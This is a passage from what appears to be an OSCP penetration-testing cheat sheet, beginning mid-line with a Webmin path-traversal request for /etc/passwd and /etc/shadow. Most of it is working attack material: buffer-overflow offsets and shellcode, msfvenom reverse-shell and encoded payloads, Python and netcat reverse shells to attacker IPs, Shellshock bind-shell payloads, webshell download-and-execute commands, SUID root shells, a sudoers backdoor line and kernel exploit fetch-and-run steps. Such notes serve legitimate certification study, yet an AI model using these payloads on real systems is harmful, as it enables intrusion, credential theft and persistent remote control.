http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd` Test to see if webmin is running as root by grabbing /etc/shadow `curl http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow` * Linux OS Enumeration * List all SUID files `find / -perm -4000 2>/dev/null` * Determine the current version of Linux `cat /etc/issue` * Determine more information about the environment `uname -a` * List processes running `ps -xaf` * List the allowed (and forbidden) commands for the invoking use `sudo -l` * List iptables rules `iptables --table nat --list iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle iptables -vL -t raw iptables -vL -t security` * Windows OS Enumeration * net config Workstation * systeminfo | findstr /B /C:"OS Name" /C:"OS Version" * hostname * net users * ipconfig /all * route print * arp -A * netstat -ano * netsh firewall show state * netsh firewall show config * schtasks /query /fo LIST /v * tasklist /SVC * net start * DRIVERQUERY * reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated * reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated * dir /s _pass_ == _cred_ == _vnc_ == _.config_ * findstr /si password *.xml *.ini *.txt * reg query HKLM /f password /t REG_SZ /s * reg query HKCU /f password /t REG_SZ /s * Vulnerability Scanning with Nmap * Nmap Exploit Scripts [_https://nmap.org/nsedoc/categories/exploit.html_](http://web.archive.org/web/20171113221652/https://nmap.org/nsedoc/categories/exploit.html) * Nmap search through vulnerability scripts `cd /usr/share/nmap/scripts/ ls -l \*vuln\*` * Nmap search through Nmap Scripts for a specific keyword `ls /usr/share/nmap/scripts/\* | grep ftp` * Scan for vulnerable exploits with nmap `nmap --script exploit -Pn $ip` * NMap Auth Scripts [_https://nmap.org/nsedoc/categories/auth.html_](http://web.archive.org/web/20171113221652/https://nmap.org/nsedoc/categories/auth.html) * Nmap Vuln Scanning [_https://nmap.org/nsedoc/categories/vuln.html_](http://web.archive.org/web/20171113221652/https://nmap.org/nsedoc/categories/vuln.html) * NMap DOS Scanning `nmap --script dos -Pn $ip NMap Execute DOS Attack nmap --max-parallelism 750 -Pn --script http-slowloris --script-args http-slowloris.runforever=true` * Scan for coldfusion web vulnerabilities `nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip` * Anonymous FTP dump with Nmap `nmap -v -p 21 --script=ftp-anon.nse $ip-254` * SMB Security mode scan with Nmap `nmap -v -p 21 --script=ftp-anon.nse $ip-254` * File Enumeration * Find UID 0 files root execution * `/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null` * Get handy linux file system enumeration script (/var/tmp) `wget https://highon.coffee/downloads/linux-local-enum.sh` `chmod +x ./linux-local-enum.sh` `./linux-local-enum.sh` * Find executable files updated in August `find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug` * Find a specific file on linux `find /. -name suid\*` * Find all the strings in a file `strings <filename>` * Determine the type of a file `file <filename>` * ## [](#http-enumeration)HTTP Enumeration * Search for folders with gobuster: `gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip` * OWasp DirBuster - Http folder enumeration - can take a dictionary file * Dirb - Directory brute force finding using a dictionary file `dirb http://$ip/ wordlist.dict` `dirb <http://vm/>` Dirb against a proxy * `dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129` * Nikto `nikto -h $ip` * HTTP Enumeration with NMAP `nmap --script=http-enum -p80 -n $ip/24` * Nmap Check the server methods `nmap --script http-methods --script-args http-methods.url-path='/test' $ip` * Get Options available from web server `curl -vX OPTIONS vm/test` * Uniscan directory finder: `uniscan -qweds -u <http://vm/>` * Wfuzz - The web brute forcer `wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test` `wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ` `wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"` `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ` Recurse level 3 `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ` * Open a service using a port knock (Secured with Knockd) for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x server_ip_address; done * WordPress Scan - Wordpress security scanner * wpscan --url $ip/blog --proxy $ip:3129 * RSH Enumeration - Unencrypted file transfer system * auxiliary/scanner/rservices/rsh_login * Finger Enumeration * finger @$ip * finger batman@$ip * TLS & SSL Testing * ./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html * Proxy Enumeration (useful for open proxies) * nikto -useproxy http://$ip:3128 -h $ip * Steganography > apt-get install steghide > > steghide extract -sf picture.jpg > > steghide info picture.jpg > > apt-get install stegosuite * The OpenVAS Vulnerability Scanner * apt-get update apt-get install openvas openvas-setup * netstat -tulpn * Login at: https://$ip:9392 # [](#buffer-overflows-and-exploits)Buffer Overflows and Exploits * DEP and ASLR - Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) * Nmap Fuzzers: * NMap Fuzzer List [https://nmap.org/nsedoc/categories/fuzzer.html](http://web.archive.org/web/20171113221652/https://nmap.org/nsedoc/categories/fuzzer.html) * NMap HTTP Form Fuzzer nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip * Nmap DNS Fuzzer nmap --script dns-fuzz --script-args timelimit=2h $ip -d * MSFvenom [_https://www.offensive-security.com/metasploit-unleashed/msfvenom/_](http://web.archive.org/web/20171113221652/https://www.offensive-security.com/metasploit-unleashed/msfvenom/) * Windows Buffer Overflows * Controlling EIP locate pattern_create pattern_create.rb -l 2700 locate pattern_offset pattern_offset.rb -q 39694438 * Verify exact location of EIP - [*] Exact match at offset 2606 buffer = "A" \* 2606 + "B" \* 4 + "C" \* 90 * Check for “Bad Characters” - Run multiple times 0x00 - 0xFF * Use Mona to determine a module that is unprotected * Bypass DEP if present by finding a Memory Location with Read and Execute access for JMP ESP * Use NASM to determine the HEX code for a JMP ESP instruction /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb JMP ESP 00000000 FFE4 jmp esp * Run Mona in immunity log window to find (FFE4) XEF command !mona find -s "\xff\xe4" -m slmfc.dll found at 0x5f4a358f - Flip around for little endian format buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390 * MSFVenom to create payload msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d" * Final Payload with NOP slide buffer="A"*2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode * Create a PE Reverse Shell msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -o shell_reverse.exe * Create a PE Reverse Shell and Encode 9 times with Shikata_ga_nai msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe * Create a PE reverse shell and embed it into an existing executable msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe * Create a PE Reverse HTTPS shell msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f exe -o met_https_reverse.exe * Linux Buffer Overflows * Run Evans Debugger against an app edb --run /usr/games/crossfire/bin/crossfire * ESP register points toward the end of our CBuffer add eax,12 jmp eax 83C00C add eax,byte +0xc FFE0 jmp eax * Check for “Bad Characters” Process of elimination - Run multiple times 0x00 - 0xFF * Find JMP ESP address "\x97\x45\x13\x08" # Found at Address 08134597 * crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90" * msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" –e x86/shikata_ga_nai * Connect to the shell with netcat: nc -v $ip 4444 # [](#shells)Shells * Netcat Shell Listener `nc -nlvp 4444` * Spawning a TTY Shell - Break out of Jail or limited shell You should almost always upgrade your shell after taking control of an apache or www user. (For example when you encounter an error message when trying to run an exploit sh: no job control in this shell ) (hint: sudo -l to see what you can run) * You may encounter limited shells that use rbash and only allow you to execute a single command per session. You can overcome this by executing an SSH shell to your localhost: ssh user@$ip nc $localip 4444 -e /bin/sh enter user's password python -c 'import pty; pty.spawn("/bin/sh")' export TERM=linux `python -c 'import pty; pty.spawn("/bin/sh")'` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF\_INET,socket.SOCK\_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"\]);' `echo os.system('/bin/bash')` `/bin/sh -i` `perl —e 'exec "/bin/sh";'` perl: `exec "/bin/sh";` ruby: `exec "/bin/sh"` lua: `os.execute('/bin/sh')` From within IRB: `exec "/bin/sh"` From within vi: `:!bash` or `:set shell=/bin/bash:shell` From within vim `':!bash':` From within nmap: `!sh` From within tcpdump echo $’id\\n/bin/netcat $ip 443 –e /bin/bash’ > /tmp/.test chmod +x /tmp/.test sudo tcpdump –ln –I eth- -w /dev/null –W 1 –G 1 –z /tmp/.tst –Z root From busybox `/bin/busybox telnetd -|/bin/sh -p9999` * Pen test monkey PHP reverse shell [http://pentestmonkey.net/tools/web-shells/php-reverse-shel](http://web.archive.org/web/20171113221652/http://pentestmonkey.net/tools/web-shells/php-reverse-shell) * php-findsock-shell - turns PHP port 80 into an interactive shell [http://pentestmonkey.net/tools/web-shells/php-findsock-shell](http://web.archive.org/web/20171113221652/http://pentestmonkey.net/tools/web-shells/php-findsock-shell) * Perl Reverse Shell [http://pentestmonkey.net/tools/web-shells/perl-reverse-shell](http://web.archive.org/web/20171113221652/http://pentestmonkey.net/tools/web-shells/perl-reverse-shell) * PHP powered web browser Shell b374k with file upload etc. [https://github.com/b374k/b374k](http://web.archive.org/web/20171113221652/https://github.com/b374k/b374k) * Windows reverse shell - PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell[https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1](http://web.archive.org/web/20171113221652/https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1) * Web Backdoors from Fuzzdb [https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors](http://web.archive.org/web/20171113221652/https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors) * Creating Meterpreter Shells with MSFVenom - [http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/](http://web.archive.org/web/20171113221652/http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/) _Linux_ `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf` _Windows_ `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe` _Mac_ `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho` **Web Payloads** _PHP_ `msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php` OR `msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php` Then we need to add the <?php at the first line of the file so that it will execute as a PHP webpage: `cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php` _ASP_ `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp` _JSP_ `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp` _WAR_ `msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war` **Scripting Payloads** _Python_ `msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py` _Bash_ `msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh` _Perl_ `msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl` **Shellcode** For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. _Linux Based Shellcode_ `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>` _Windows Based Shellcode_ `msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>` _Mac Based Shellcode_ `msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>` **Handlers** Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. use exploit/multi/handler set PAYLOAD <Payload name> set LHOST <LHOST value> set LPORT <LPORT value> set ExitOnSession false exploit -j -z Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ * SSH to Meterpreter: [https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/](http://web.archive.org/web/20171113221652/https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/) use auxiliary/scanner/ssh/ssh_login use post/multi/manage/shell_to_meterpreter * SBD.exe sbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32\. sbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only. sbd.exe (part of the Kali linux distribution: /usr/share/windows-binaries/backdoors/sbd.exe) can be uploaded to a windows box as a Netcat alternative. * Shellshock * Testing for shell shock with NMap `root@kali:~/Documents# nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/admin.cgi $ip` * git clone [https://github.com/nccgroup/shocker](http://web.archive.org/web/20171113221652/https://github.com/nccgroup/shocker) `./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose` * Shell Shock SSH Forced Command Check for forced command by enabling all debug output with ssh ssh -vvv ssh -i noob noob@$ip '() { :;}; /bin/bash' * cat file (view file contents) echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; echo \\$(</etc/passwd)\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80 * Shell Shock run bind shell echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {:;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80 # [](#file-transfers)File Transfers * Post exploitation refers to the actions performed by an attacker, once some level of control has been gained on his target. * Simple Local Web Servers * Run a basic http server, great for serving up shells etc python -m SimpleHTTPServer 80 * Run a basic Python3 http server, great for serving up shells etc python3 -m http.server * Run a ruby webrick basic http server ruby -rwebrick -e "WEBrick::HTTPServer.new (:Port => 80, :DocumentRoot => Dir.pwd).start" * Run a basic PHP http server php -S $ip:80 * Creating a wget VB Script on Windows: [_https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt_](http://web.archive.org/web/20171113221652/https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt) * Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line): echo Set args = Wscript.Arguments >> webdl.vbs timeout 1 echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs timeout 1 echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs timeout 1 echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs timeout 1 echo xHttp.Open "GET", Url, False >> webdl.vbs timeout 1 echo xHttp.Send >> webdl.vbs timeout 1 echo with bStrm >> webdl.vbs timeout 1 echo .type = 1 ' >> webdl.vbs timeout 1 echo .open >> webdl.vbs timeout 1 echo .write xHttp.responseBody >> webdl.vbs timeout 1 echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs timeout 1 echo end with >> webdl.vbs timeout 1 echo The file can be run using the following syntax: `C:\temp\cscript.exe webdl.vbs` * Mounting File Shares * Mount NFS share to /mnt/nfs mount $ip:/vol/share /mnt/nfs * HTTP Put nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php * ## [](#uploading-files)Uploading Files * SCP scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2 scp localfile username@$ip:~/Folder/ scp Linux_Exploit_Suggester.pl bob@192.168.1.10:~ * Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor `davtest -move -sendbd auto -url http://$ip` [https://github.com/cldrn/davtest](http://web.archive.org/web/20171113221652/https://github.com/cldrn/davtest) You can also upload a file using the PUT method with the curl command: `curl -T 'leetshellz.txt' 'http://$ip'` And rename it to an executable file using the MOVE method with the curl command: `curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'` * Upload shell using limited php shell cmd use the webshell to download and execute the meterpreter [curl -s --data "cmd=wget [http://174.0.42.42:8000/dhn](http://web.archive.org/web/20171113221652/http://174.0.42.42:8000/dhn) -O /tmp/evil" http://$ip/files/sh.php [curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/files/sh.php curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php * TFTP mkdir /tftp atftpd --daemon --port 69 /tftp cp /usr/share/windows-binaries/nc.exe /tftp/ EX. FROM WINDOWS HOST: C:\Users\Offsec>tftp -i $ip get nc.exe * FTP apt-get update && apt-get install pure-ftpd #!/bin/bash groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pw useradd offsec -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth/ ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/ /etc/init.d/pure-ftpd restart * ## [](#packing-files)Packing Files * Ultimate Packer for eXecutables upx -9 nc.exe * exe2bat - Converts EXE to a text file that can be copied and pasted locate exe2bat wine exe2bat.exe nc.exe nc.txt * Veil - Evasion Framework - [https://github.com/Veil-Framework/Veil-Evasion](http://web.archive.org/web/20171113221652/https://github.com/Veil-Framework/Veil-Evasion) apt-get -y install git git clone [https://github.com/Veil-Framework/Veil-Evasion.git](http://web.archive.org/web/20171113221652/https://github.com/Veil-Framework/Veil-Evasion.git) cd Veil-Evasion/ cd setup setup.sh -c # [](#privilege-escalation)Privilege Escalation _Password reuse is your friend. The OSCP labs are true to life, in the way that the users will reuse passwords across different services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter._ * ## [](#linux-privilege-escalation)Linux Privilege Escalation * Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration:[https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](http://web.archive.org/web/20171113221652/https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) * Try the obvious - Maybe the user is root or can sudo to root: `id` `sudo su` * Here are the commands I have learned to use to perform linux enumeration and privledge escalation: What users can login to this box (Do they use thier username as thier password)?: `grep -vE "nologin|false" /etc/passwd` What kernel version are we using? Do we have any kernel exploits for this version? `uname -a` `searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"` What applications have active connections?: `netstat -tulpn` What services are running as root?: `ps aux | grep root` What files run as root / SUID / GUID?: find / -perm +2000 -user root -type f -print find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here. find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null What folders are world writeable?: find / -writable -type d 2>/dev/null # world-writeable folders find / -perm -222 -type d 2>/dev/null # world-writeable folders find / -perm -o w -type d 2>/dev/null # world-writeable folders find / -perm -o x -type d 2>/dev/null # world-executable folders find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders * There are a few scripts that can automate the linux enumeration process: * Google is my favorite Linux Kernel exploitation search tool. Many of these automated checkers are missing important kernel exploits which can create a very frustrating blindspot during your OSCP course. * LinuxPrivChecker.py - My favorite automated linux priv enumeration checker - [https://www.securitysift.com/download/linuxprivchecker.py](http://web.archive.org/web/20171113221652/https://www.securitysift.com/download/linuxprivchecker.py) * LinEnum - (Recently Updated) [https://github.com/rebootuser/LinEnum](http://web.archive.org/web/20171113221652/https://github.com/rebootuser/LinEnum) * linux-exploit-suggester (Recently Updated) [https://github.com/mzet-/linux-exploit-suggester](http://web.archive.org/web/20171113221652/https://github.com/mzet-/linux-exploit-suggester) * Highon.coffee Linux Local Enum - Great enumeration script! `wget https://highon.coffee/downloads/linux-local-enum.sh` * Linux Privilege Exploit Suggester (Old has not been updated in years) [https://github.com/PenturaLabs/Linux_Exploit_Suggester](http://web.archive.org/web/20171113221652/https://github.com/PenturaLabs/Linux_Exploit_Suggester) * Linux post exploitation enumeration and exploit checking tools [https://github.com/reider-roque/linpostexp](http://web.archive.org/web/20171113221652/https://github.com/reider-roque/linpostexp) Handy Kernel Exploits * CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) [https://www.exploit-db.com/exploits/14814/](http://web.archive.org/web/20171113221652/https://www.exploit-db.com/exploits/14814/) wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814 $ gcc i-can-haz-modharden.c -o i-can-haz-modharden $ ./i-can-haz-modharden [+] launching root shell! # id uid=0(root) gid=0(root) * CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8 [https://www.exploit-db.com/exploits/15285/](http://web.archive.org/web/20171113221652/https://www.exploit-db.com/exploits/15285/) * CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) [https://git.zx2c4.com/CVE-2012-0056/about/](http://web.archive.org/web/20171113221652/https://git.zx2c4.com/CVE-2012-0056/about/) Linux CVE 2012-0056 wget -O exploit.c http://www.exploit-db.com/download/18411 gcc -o mempodipper exploit.c ./mempodipper * CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 [https://dirtycow.ninja/](http://web.archive.org/web/20171113221652/https://dirtycow.ninja/) First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016 * Run a command as a user other than root sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf * Add a user or change a password /usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor echo thePassword | passwd haxzor --stdin * Local Privilege Escalation Exploit in Linux * **SUID** (**S**et owner **U**ser **ID** up on execution) Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required. below are some quick copy and paste examples for various shells: SUID C Shell for /bin/bash int main(void){ setresuid(0, 0, 0); system("/bin/bash"); } SUID C Shell for /bin/sh int main(void){ setresuid(0, 0, 0); system("/bin/sh"); } Building the SUID Shell binary gcc -o suid suid.c For 32 bit: gcc -m32 -o suid suid.c * Create and compile an SUID from a limited shell (no file transfer) echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c gcc privsc.c -o privsc * Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement: `echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update` * You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on port 4444. set PATH="/tmp:/usr/local/bin:/usr/bin:/bin" echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh chmod +x ssh * SearchSploit searchsploit –uncsearchsploit apache 2.2 searchsploit "Linux Kernel" searchsploit linux 2.6 | grep -i ubuntu | grep local searchsploit slmail * Kernel Exploit Suggestions for Kernel Version 3.0.0 `./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0` * Precompiled Linux Kernel Exploits - _**Super handy if GCC is not installed on the target machine!**_ [_https://www.kernel-exploits.com/_](http://web.archive.org/web/20171113221652/https://www.kernel-exploits.com/) * Collect root password `cat /etc/shadow |grep root` * Find and display the proof.txt or flag.txt - LOOT! cat `find / -name proof.txt -print` * ## [](#windows-privilege-escalation)Windows Privilege Escalation * Windows Privilege Escalation resource [http://www.fuzzysecurity.com/tutorials/16.html](http://web.archive.org/web/20171113221652/http://www.fuzzysecurity.com/tutorials/16.html) * Metasploit Meterpreter Privilege Escalation Guide [https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/](http://web.archive.org/web/20171113221652/https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/) * Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group: `whoami` `net user "%username%"` * Try the getsystem command using meterpreter - rarely works but is worth a try. `meterpreter > getsystem` * No File Upload Required Windows Privlege Escalation Basic Information Gathering (based on the fuzzy security tutorial and windows_privesc_check.py). Copy and paste the following contents into your remote Windows shell in Kali to generate a quick report: @echo --------- BASIC WINDOWS RECON --------- > report.txt timeout 1 net config Workstation >> report.txt timeout 1 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> report.txt timeout 1 hostname >> report.txt timeout 1 net users >> report.txt timeout 1 ipconfig /all >> report.txt timeout 1 route print >> report.txt timeout 1 arp -A >> report.txt timeout 1 netstat -ano >> report.txt timeout 1 netsh firewall show state >> report.txt timeout 1 netsh firewall show config >> report.txt timeout 1 schtasks /query /fo LIST /v >> report.txt timeout 1 tasklist /SVC >> report.txt timeout 1 net start >> report.txt timeout 1 DRIVERQUERY >> report.txt timeout 1 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt timeout 1 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt timeout 1 dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt timeout 1 findstr /si password *.xml *.ini *.txt >> report.txt timeout 1 reg query HKLM /f password /t REG_SZ /s >> report.txt timeout 1 reg query HKCU /f password /t REG_SZ /s >> report.txt timeout 1 dir "C:\" timeout 1 dir "C:\Program Files\" >> report.txt timeout 1 dir "C:\Program Files (x86)\" timeout 1 dir "C:\Users\" timeout 1 dir "C:\Users\Public\" timeout 1 echo REPORT COMPLETE! * Windows Server 2003 and IIS 6.0 WEBDAV Exploiting [http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html](http://web.archive.org/web/20171113221652/http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html) msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt cadavar http://$ip dav:/> put aspshell.txt Uploading aspshell.txt to `/aspshell.txt': Progress: [=============================>] 100.0% of 38468 bytes succeeded. dav:/> copy aspshell.txt aspshell3.asp;.txt Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded. dav:/> exit msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 1.2.3.4 msf exploit(handler) > set LPORT 80 msf exploit(handler) > set ExitOnSession false msf exploit(handler) > exploit -j curl http://$ip/aspshell3.asp;.txt [*] Started reverse TCP handler on 1.2.3.4:443 [*] Starting the payload handler... [*] Sending stage (957487 bytes) to 1.2.3.5 [*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700 * Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server. pip install pyinstaller wget -O exploit.py http://www.exploit-db.com/download/31853 python pyinstaller.py --onefile exploit.py * Windows Server 2003 and IIS 6.0 privledge escalation using impersonation: [https://www.exploit-db.com/exploits/6705/](http://web.archive.org/web/20171113221652/https://www.exploit-db.com/exploits/6705/) [https://github.com/Re4son/Churrasco](http://web.archive.org/web/20171113221652/https://github.com/Re4son/Churrasco) 